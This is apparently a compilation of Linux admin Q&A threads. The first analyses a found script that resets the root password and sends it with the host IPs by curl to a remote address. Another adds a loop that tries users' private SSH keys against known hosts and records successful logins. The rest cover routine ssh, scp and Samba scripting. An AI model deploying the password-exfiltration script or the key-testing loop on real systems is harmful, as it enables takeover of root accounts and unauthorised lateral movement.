Is the attached script an attempt to crack passwords? - Linux

I found this entry in my crontab:
#@reboot /usr/local/bin/email_passwordscript.sh
Although it is commented out, it worried me so I looked for this script in /usr/local/bin. I found the following script in my folder, but interestingly with a different name (set_password.sh):
#!/bin/sh
PASSWORD=$1
if [ "$#" -eq 0 ]; then
IPS=$(hostname -I)
PASSWORD=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 12)
IPS=$(echo $IPS | sed 's/ /%20/g')
OLD_PASSWORD=1
fi
echo "PASSWORD IS $PASSWORD" >> /var/log/new_passwordscript.log
echo "root:$PASSWORD" | chpasswd
hostname_str=`hostname`
sed -i "s/%HOSTNAME%/$hostname_str/" /etc/zabbix/zabbix_agentd.conf
if [ $OLD_PASSWORD == 1 ]; then
curl -X GET "http://172.16.98.14:8887/passwordemailservice?ip=$IPS&password=$PASSWORD" >> /var/log/passwordscript.log
fi
Is this an attempt to hack my machine? If so, can anyone offer clues on how this happened? It appears to be someone on my local network, but that IP address does not provide any clues, i.e. there is no response from it.

This code seems dangerous.
The code changes the root password of a machine and sends the IP address of the machine along with its password to a remote computer.
How it works:
PASSWORD=$1
Assigns the first argument of the call to PASSWORD.
if [ "$#" -eq 0 ];
IPS=$(hostname -I)
PASSWORD=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 12)
IPS=$(echo $IPS | sed 's/ /%20/g')
OLD_PASSWORD=1
fi
Checks whether an argument was given, e.g. ./email_passwordscript.sh XXX. If there isn't one, it generates a random password (and URL-encodes the host's IP addresses for the curl request below).
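For illustration, two hypothetical invocations (the script has to run as root for chpasswd to succeed):
./set_password.sh 'SomeNewPassword'   # uses the supplied password; no report is sent, curl only runs when the script generated the password itself
./set_password.sh                     # generates a random 12-character password and reports it via curl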
echo "root:$PASSWORD" | chpasswd
This line changes root's password.
curl -X GET "http://172.16.98.14:8887/passwordemailservice?ip=$IPS&password=$PASSWORD"
Sends the machine's IP address(es) and the new password to a remote server.
How did it happen?
This is difficult to answer, as there are many ways this script could have gotten onto your computer, such as:
Someone having physical access to your machine
Unintentionally installing malicious software
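If you want to gather clues about when and how it got there, a few hedged starting points (paths assume a typical Debian-style layout; adjust for your distribution):
stat /usr/local/bin/set_password.sh        # creation/modification time and owner
dpkg -S /usr/local/bin/set_password.sh     # does any package own it? (rpm -qf on RPM-based systems)
ls -l /var/spool/cron/crontabs/root        # when was root's crontab last changed?
grep -iE 'session opened|sudo' /var/log/auth.log   # logins and sudo activity around those times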

Related

Testing active ssh keys on the local network

I am currently trying to write a bash script that will check whether the SSH keys on a server are still linked to known hosts that are active on the local area network. Below is the beginning of my bash script:
#!/bin/bash
# LAN SSH KEYS DISCOVERY SCRIPT
# TRYING TO FIND THOSE SSH KEYS NOW
cat /etc/passwd | grep /bin/bash > bash_users
cat bash_users | cut -d ":" -f 6 > cutted.bash_users_home_dir
for bash_users in $(cat cutted.bash_users_home_dir)
do
ls -al $bash_users/.ssh/*id_* >> ssh-keys.txt
done
# DISCOVERING THE KNOWN_HOSTS NOW
for known_hosts in $(cat cutted.bash_users_home_dir)
do
cat $bash_users/.ssh/known_hosts | awk '{print $1}' | sort -u >> hosts_known.txt
sleep 2
done
hosts_known=$(wc -l hosts_known.txt)
echo "We have $hosts_known known hosts that could be still active via SSH
keys"
# TIME TO TEST WHICH SSH servers are still active with the SSH keys
# AND THIS IS WHERE I AM FROZEN...
# Would love to have bash script that could
# ssh -l $users_that_have_/bin/bash -i $ssh_keys $ssh_servers
# Would also be very nice if it could save active
# SSH servers with the valid keys in output.txt in the format
# username:local-IP:/path/to/SSH_key
Please feel free to edit/modify the bash script above if that better serves the goals described.
Any help would be much appreciated.
Thanks
The following works nicely:
</etc/passwd \
grep /bin/bash |
cut -d: -f6 |
sudo xargs -i -- sh -c '
[ -e "$1" ] && cat "$1"
' -- {}/.ssh/known_hosts |
cut -d' ' -f1 |
tr ',' '\n' |
sed '
/^\[/{
s/\[\(.*\)\]:\(.*\)/\1 \2/;
t;
};
s/$/ 22/;
' |
sort -u |
xargs -l1 -- sh -c '
if echo "~" | nc -q1 -w3 "$1" "$2" | grep -q "^SSH"; then
echo "#### SUCCESS $1 $2";
else
echo "#### ERROR $1 $2";
fi
' --
So:
Start with /etc/passwd
Filter all "bash_users" as you call them
Extract just the user home directories with cut -d: -f6
For each user home directory, run (via sudo xargs -i --):
Check if the file .ssh/known_hosts inside the user home directory exists
If it does, print it
Keep only the host names
Multiple host names may share the same key and are separated by commas, so replace each comma with a newline
Now a sed script:
If a line starts with a [ that means it has a format of [host]:port and I want to replace it with host port
If the line does not start with a [ I add 22 to the end of the line so it's host 22
Then I sort -u
Now for each line:
I grab the SSH banner: echo "~" | nc hostname port returns something like "SSH-2.0-OpenSSH_6.0" + newline + "Protocol mismatch".
So if the line returned by nc hostname port starts with SSH, that means there is ssh running on the other side.
I added a timeout for unresponsive hosts; the nc -w timeout option may also be used, and nc -q 1 should probably be specified as well.
Now the real fun: when you add the max-procs option to the last xargs invocation, you can check all the hosts simultaneously. On my host I have 47 unique addresses, and xargs -P30 checks them ALL in about 2 seconds.
There are some real problems, though. The script needs root to read every user's known_hosts. Worse, the known_hosts entries may be hashed. It would be better to first know the list of hosts on your network and then generate known_hosts from it, with something like ssh-keyscan -f list_of_hosts > ~/.ssh/known_hosts. Generally ssh-keygen -F hostname should be used to check whether a host exists in known_hosts; sadly there is no listing command. The known_hosts file format is described in the ssh documentation.
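To go one step further and actually test whether a key still grants a login (which is what the question is ultimately after), a rough sketch along these lines might work. It needs root to read other users' private keys; hosts_ports.txt (lines of "host port", e.g. saved from the sort -u stage above), output.txt, and the assumption that the login name equals the home directory's basename are all mine, not part of the original:
while read -r home; do
    user=$(basename "$home")                     # assumption: login name == home dir basename
    for key in "$home"/.ssh/id_*; do
        [ -f "$key" ] || continue
        case "$key" in *.pub) continue ;; esac   # skip public keys
        while read -r host port; do
            if ssh -n -i "$key" -o IdentitiesOnly=yes -o BatchMode=yes \
                   -o ConnectTimeout=3 -o StrictHostKeyChecking=no \
                   -p "${port:-22}" "$user@$host" true 2>/dev/null
            then
                echo "$user:$host:$key" >> output.txt
            fi
        done < hosts_ports.txt
    done
done < cutted.bash_users_home_dir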

Bash script to find filesystem usage

EDIT: Working script below
I have used this site MANY times to get answers, but I am a little stumped with this.
I am tasked with writing a script, in bash, to log into roughly 2000 Unix servers (Solaris, AIX, Linux) and check the size of the OS filesystems, most notably /var, /usr and /opt.
I have set some variables, which may be where I am going wrong right off the bat.
1) First I connect to another server that has a list of all hosts in the infrastructure, then I parse this data with some sed commands to get a list I can use properly.
2) Then I do a ping test to see if the server is alive or has been decommissioned. The idea behind this is that if the server is not pingable, I don't want it reported on, or any attempt made to connect to it, as that just wastes time. I feel I am doing this wrong, but don't know how to do it correctly (a recurring theme you will hear in this post, lol).
If any FS is over the 80% mark, it should be output to a text file with the server name, filesystem and size on one line <== very important for me.
If the FS is under 80% full, I don't want it in my output; it can be omitted completely.
I have created something that I will post below, and am hoping to get some help in figuring out where I am going wrong. I am very new to bash scripting, but have experience as a Unix admin (I have never been good at scripting).
Can anyone provide some direction and teach me where I am going wrong?
I will hopefully upload my script, which I can confirm is working, tomorrow. Thanks everyone for your input on this!
Here is my "disk usage" linux script, i hope that help you.
#!/bin/sh
df -H | grep -v '^Filesystem' | awk '{ print $5 " " $6 }' | while read output;
do
echo $output
usep=$(echo $output | awk '{ print $1}' | cut -d'%' -f1 )
partition=$(echo $output | awk '{ print $2 }' )
if [ $usep -ge 90 ]; then
echo "Running out of space \"$partition ($usep%)\" on $(hostname) as on $(date)" |
mail -s "Warning! There is no space on the disk: $usep%" root#domain.com
fi
done
Some trouble is here:
ping -c 1 -W 3 $i > /dev/null 2>&1
if [ $? -ne 0 ]; then
echo "$i is offline" >> $LOG
fi
You need a continue statement inside that if. Your program isn't really treating non-pingable hosts differently, just logging that they're not pingable.
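Something like this, reusing your variable names:
ping -c 1 -W 3 $i > /dev/null 2>&1
if [ $? -ne 0 ]; then
echo "$i is offline" >> $LOG
continue    # skip straight to the next host
fi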
Okay, now I'm looking a little deeper, and there's more naive stuff in here. These shouldn't work:
SOLVARFS=$(df -h /var |cut -f5 |grep -v capacity |awk '{print $5}')
SOLUSRFS=$(df -h /usr |cut -f5 |grep -v capacity |awk '{print $5}')
SOLOPTFS=$(df -h /opt |cut -f5 |grep -v capacity |awk '{print $5}')
etc...
The problem with these lines is that the command substitution gets assigned to the variables before the ssh session happens. So the content of each variable is the command's result on your local system, not the command itself. Since you're doing command substitution around your ssh calls, it might well work just to rewrite these lines as follows (note the backslash escapes on $5):
SOLVARFS="df -h /var |cut -f5 |grep -v capacity |awk '{print \$5}'"
SOLUSRFS="df -h /usr |cut -f5 |grep -v capacity |awk '{print \$5}'"
SOLOPTFS="df -h /opt |cut -f5 |grep -v capacity |awk '{print \$5}'"
etc...
The part where you're contacting another server has some more stuff to correct. You don't need three if statements per server, and there's no reason to echo anything to /dev/null. Here's a rewrite for the SunOS section. For each directory you're checking, it outputs the host name, the command name (so you can see which dir was being checked), and the result:
if [[ $UNAME = "SunOS" ]]; then
for SSH_COMMAND in SOLVARFS SOLUSRFS SOLOPTFS ; do
RESULT=`ssh -o PasswordAuthentication=no -o BatchMode=yes -o StrictHostKeyChecking=no -o ConnectTimeout=2 GSSAPIAuthentication=no -q $i ${!SSH_COMMAND}`
if ["$RESULT" -gt 80] ; do
echo "$i, $SSH_COMMAND, $RESULT" >> $LOG
fi
done
fi
Note that the ${!BLAH} construction is variable indirection. "Give me the contents of the variable named by BLAH".
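A quick illustration of that indirection, in case it's unfamiliar:
SOLVARFS="df -h /var |cut -f5 |grep -v capacity |awk '{print \$5}'"
SSH_COMMAND=SOLVARFS
echo "${!SSH_COMMAND}"   # prints the df pipeline stored in SOLVARFS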
Your original script does a bunch of things less-than-optimally. Rather than running an almost-identical block of code for each filesystem and each operating system, the thing to do would be to record the differences in a way that a SINGLE piece of code can iterate over all your objects, adapting as required.
Here's my take on this. Commands should appear ONCE, but
they get run multiple times by loops, and
they get run multiple ways using arrays.
The following script passes lint checks, but obviously this is untested, as I don't have your environment to test in.
You might still want to think about how your logging and notifications work.
#!/bin/bash
# Assign temp file, remove it automatically upon successful exit.
tmpfile=$(mktemp /tmp/${0##*/}.XXXX)
trap "rm '$tmpfile'" 0
#NOW=$(date +"%Y-%m-%d-%T")
NOW=$(date +"%F")
LOG=/usr/scripts/disk_usage/Unix_df_issues-$NOW.txt
printf '' > "$LOG"
# Use variables to refer to commonly accessed files. If you change a name, just do it once.
rawhostlist=all_vms.txt
host_os=${rawhostlist}_OS
# Commonly-used options need only be declared once. Use an array for easier management.
declare -a ssh_opts=()
ssh_opts+=(-o PasswordAuthentication=no)
ssh_opts+=(-o BatchMode=yes)
ssh_opts+=(-o StrictHostKeyChecking=no) # Eliminate prompts on new hosts
ssh_opts+=(-o ConnectTimeout=2) # This should make your `ping` unnecessary.
ssh_opts+=(-o GSSAPIAuthentication=no) # This is default. Do we really need it?
# Note: Associative arrays require Bash 4.x.
declare -A df_opts=(
[SunOS]="-h"
[Linux]="-hP"
[AIX]=""
)
declare -A df_column=(
[SunOS]=5
[Linux]=5
[AIX]=4
)
# Fetch host list from configserver, stripping /^adm/ on the remote end.
ssh "${ssh_opts[#]}" -q configserver "sed 's/^adm//' /reports/*/HOSTNAME" > "$rawhostlist"
# Confirm that our host_os cache is up to date and process any missing hosts.
awk '
NR==FNR { h[$1]; next } # Add everything in rawhostlist to an array...
{ delete h[$1] } # Then remove any entries that exist in host_os.
END {
for (i in h) print i # And print whatever remains.
}' "$rawhostlist" "$host_os" |
while read h; do
printf '%s\t%s\n' "$h" "$(ssh "${ssh_opts[@]}" -q "$h" uname -s)"
done >> "$host_os"
# Next, step through the host list and collect data.
while read host os; do
ssh "${ssh_opts[#]}" "$host" df "${df_opts[$os]}" /var /usr /opt |
awk -v column="${df_column[$os]}" -v host="$host" 'NR>1 { print host,$1,$column }'
)
done < "$host_os" > "$tmpfile"
# Now that we have all our data, check for warning/critical levels.
while read host filesystem usage; do
if [ "$usage" -gt 80 ]; then
status="CRITICAL"
elif [ "$usage" -gt 70 ]; then
status="WARNING"
else
continue
fi
# Log our results to our log file, AND send them to stderr.
printf "[%s] %s: %s:%s at %d%%\n" "$(date +"%F %T")" "$status" "$host" "$filesystem" "$usage" | tee -a "$LOG" >&2
done < "$tmpfile"
# Email and record our results.
if [ -s "$LOG" ]; then
mail -s "Daily Unix /var Report - $NOW" unixsystems#examplle.com < "$LOG"
mv "$LOG" /var/log/vm_reports/
fi
Consider this example code. If you like the way it looks, your next task is to debug it, or open new questions for parts that you're having trouble debugging. :-)

scp: how to find out that copying was finished

I'm using the scp command to copy a file from one Linux host to another.
I run the scp command on host1 and copy a file from host1 to host2. The file is quite big and it takes some time to copy.
On host2 the file appears immediately, as soon as copying starts. I can do everything with this file even while copying is still in progress.
Is there any reliable way to find out on host2 whether the copying has finished?
Off the top of my head, you could do something like:
touch tinyfile
scp bigfile tinyfile user@host:
Then when tinyfile appears you know that the transfer of bigfile is complete.
As pointed out in the comments, this assumes that scp will copy the files one by one, in the order specified. If you don't trust it, you could do them one by one explicitly:
scp bigfile user@host:
scp tinyfile user@host:
The disadvantage of this approach is that you would potentially have to authenticate twice. If this were an issue you could use something like ssh-agent.
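For example, a rough sketch with ssh-agent (the key path is an assumption):
eval "$(ssh-agent -s)"        # start an agent for this shell
ssh-add ~/.ssh/id_rsa         # unlock your key once
scp bigfile user@host:
scp tinyfile user@host:       # no second passphrase prompt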
On sending side (host1) use script like this:
#!/bin/bash
echo 'starting transfer'
scp FILE USER@DST_SERVER:DST_PATH
OUT=$?
if [ $OUT = 0 ]; then
echo 'transfer successful'
touch successful
scp successful USER@DST_SERVER:DST_PATH
else
echo 'transfer failed'
fi
On receiving side (host2) make script like this:
#!/bin/bash
SLEEP_TIME=30
MAX_CNT=10
CNT=0
while [[ ! -e successful && $CNT -lt $MAX_CNT ]]; do
((CNT++))
sleep "$SLEEP_TIME"
done;
if [[ -e successful ]]; then
echo 'successful'
rm successful
# do somethning with FILE
fi
With CNT and MAX_CNT you prevent an endless loop (in case the file successful is never transferred).
The product of MAX_CNT and SLEEP_TIME should be equal to or greater than the expected transfer time. In my example the expected transfer time is less than 300 seconds.
A checksum (md5sum, sha256sum, sha512sum) of the local and remote files would tell you whether they're identical.
For the situation where you don't have SSH access to the remote system - like an FTP server - you can download the file after it's uploaded and compare the checksums. I do this for files I send from production scripts at work. Below is a snippet from the script in which I do this.
MD5SRC=$(md5sum $LOCALFILE | cut -c 1-32)
MD5TESTFILE=$(mktemp -p /ramdisk)
curl \
-o $MD5TESTFILE \
-sS \
-u $FTPUSER:$FTPPASS \
ftp://$FTPHOST/$REMOTEFILE
MD5DST=$(md5sum $MD5TESTFILE | cut -c 1-32)
if [ "$MD5SRC" == "$MD5DST" ]
then
echo "+Local and Remote files match!"
else
echo "-Local and Remote files don't match"
fi
If you use inotify-tools, then the solution will look like this:
while ! inotifywait -e close $(dirname ${bigfile_fullname}) 2>/dev/null | \
grep -Eo "CLOSE $(basename ${bigfile_fullname})$">/dev/null
do true
done
echo "File ${bigfile_fullname} closed"
After some investigation and discussion of the problem on other forums, I have found one more solution. Maybe it can help somebody.
There is a command "lsof". It lists open files. During copying the file will be opened, so the command
lsof | grep filename
will return a non-empty result.
So you might want to make a while loop to wait until lsof returns nothing and proceed with your task.
Example:
# provide your file name here
f=<nameOfYourFile>
lsofresult=`lsof | grep $f | wc -l`
while [ $lsofresult != 0 ]; do
echo still copying file $f...
sleep 5
lsofresult=`lsof | grep $f | wc -l`
done; echo copying file $f is finished: `ls $f`
For the duplicate question, How to check if file has been scp 100% to the remote location, which was about an expect script, we can add expect 100% to know when a file has transferred completely, i.e. something like this:
expect -c "
set timeout 1
spawn scp user@$REMOTE_IP:/tmp/my.file user@$HOST_IP:/home/.
expect yes/no { send yes\r ; exp_continue }
expect password: { send $SCP_PASSWORD\r }
expect 100%
sleep 1
exit
"
if [ -f "/home/my.file" ]; then
echo "Success"
fi
If avoiding a second SSH handshake is important, you can use something like the following:
ssh host cat \> bigfile \&\& touch complete < bigfile
Then wait for the "complete" file to get created on the remote end.
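On the remote end, a minimal wait loop for that marker might look like:
while [ ! -e complete ]; do sleep 5; done
# bigfile is now fully written; safe to process it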

Is it possible to run a script which loops through hosts with rsh/ssh

I have tried to run the following csh script, which uses rsh/ssh to connect to all computers on our network with the purpose of yum-installing software passed as arguments. However, the script fails to continue once it has rsh'd to another host. Is there a way around this problem?
if ($1 == "")then
echo -n "Please enter a package to install\n"
set package=$<
else set package = $#argv
endif
set numlines = `cat $NM_HOME/sh_local/nc_network2.txt | grep -v "^#" | fgrep "%" | wc -l`
while ($numlines>0)
set line = `cat $NM_HOME/sh_local/nc_network2.txt | grep -v "^#" | fgrep "%" | tail -$numlines | head -1`
set host2 = `echo $line | cut -f 1 -d %`
set where = `echo $line | cut -f 2 -d %`
if ($host2 == $this_machine) then
echo "This is $host2....skipping rsh to this machine"
echo ""
goto yum
endif
echo ""
echo "logging into $host2 $where"
echo ""
sleep 1
rsh $host2
yum:
echo ""
echo "Preparing to install $package on $host2"
sudo yum -y install $package
if ($host2 == $this_machine) then
goto decrement
else
logout
goto decrement
endif
decrement:
@ numlines--
end
ssh/rsh-ing to another host does not magically continue the execution of your script on that host. Executing ssh hostname in a script has the exact same effect as executing ssh hostname in your shell — it connects to that machine, runs an interactive shell there, and leaves you in that shell. Your script execution will only continue after you close the ssh/rsh connection yourself.
In order to perform some action on that host, you need to provide an explicit command you want to run on that host, like this:
rsh $host2 sudo yum -y install $package
Note that this is only a naive example for illustration purposes; it likely won't be enough to fix the entire logic of your script, but should point you in the right direction.
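As a rough sketch only (in bash rather than csh, and assuming key-based ssh plus passwordless sudo on the remote hosts), the whole loop could collapse to something like this:
#!/bin/bash
package=$1
# nc_network2.txt lines look like "host%where", as in the original script
grep -v '^#' "$NM_HOME/sh_local/nc_network2.txt" | grep '%' |
while IFS='%' read -r host2 where; do
    echo "Installing $package on $host2 ($where)"
    ssh -o BatchMode=yes "$host2" "sudo yum -y install $package"
done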
YES. My answer below is based only on reading your question, not on the code you posted.
I have been doing this for many years as below.
Create a list of hosts with one host on each line.
Enable SSH key-based authentication up front. This can be done manually, but I have done it in the past using perl and expect.
Run a for loop as below to perform the action on all the servers:
for i in $(cat hosts_list); do ssh $i dmidecode | grep -m 1 'Serial Number:'; done
The above one-liner will give me the serial numbers of all the servers which are mentioned in hosts_list. This is a short example of pulling serial numbers; however, you can write a full-fledged bash script following the exact same logic.
For more advanced requirements, consider using perl and the SSH modules that are available on CPAN.

Finding authenticated Windows user remotely with Linux

I'm working on a project that needs to determine the username currently logged into a Windows workstation from a Linux client. The Linux client has the IP address / hostname of the workstation, and can potentially access the Active Directory domain controller, but has nothing else.
I understand that the "psloggedon \\hostname" utility from Windows would do the job, but I'm looking for a Linux/Unix alternative.
Any suggestions?
This is the script I'm using. It requires Samba, I think at least version 3.x. It only asks for the domain admin password once per run; not really secure, but better than hardcoding it into the script.
#!/bin/bash
ADMIN_USER='DOMAIN_NAME\Administrator'
DOMAIN_CONTROLLER='hostname.of.domain.controller'
#
die () {
echo >&2 "$#"
exit 1
}
# Die if computer name missing
[ "$#" -eq 1 ] || die "Usage: loggedon <computer>"
COMPUTER=$1
# Store domain admin password in a variable to avoid asking every time.
read -s -p "Please provide domain administrator password: " ADMIN_PASSWORD
echo
# Store all sids logged on $COMPUTER inside an array
# Notice I'm using the PASSWD environment variable to push the admin password
# to the net command, so it won't ask for it.
#
SIDs=(`PASSWD=$ADMIN_PASSWORD /usr/bin/net rpc registry enumerate 'HKEY_USERS' -S $COMPUTER -U $ADMIN_USER | grep _Classes | cut -d '=' -f2 | sed 's/ //g'`)
if [ "${#SIDs[#]}" -gt 0 ]; then
printf "Found %s logged on $COMPUTER\n" "${SIDs[#]}"
echo
# Retrieves CommonName attribute from DC for each SID
for i in "${SIDs[#]}"
do
:
RAW_USER=`PASSWD=$ADMIN_PASSWORD net ads sid -S $DOMAIN_CONTROLLER -U Administrator $i`
#RAW_USER contains all attributes from ldap, we need to clean it first
USER=`echo $RAW_USER | egrep -o 'cn: (.+)sn:' | sed -e 's/sn\://g'`
echo "$USER is logged on $COMPUTER"
done
else
echo Nobody is logged on $COMPUTER
fi
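Usage would then be something like this, where WORKSTATION01 is a placeholder for the target workstation's hostname or IP; the script prompts once for the domain administrator password and then prints who is logged on:
./loggedon WORKSTATION01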
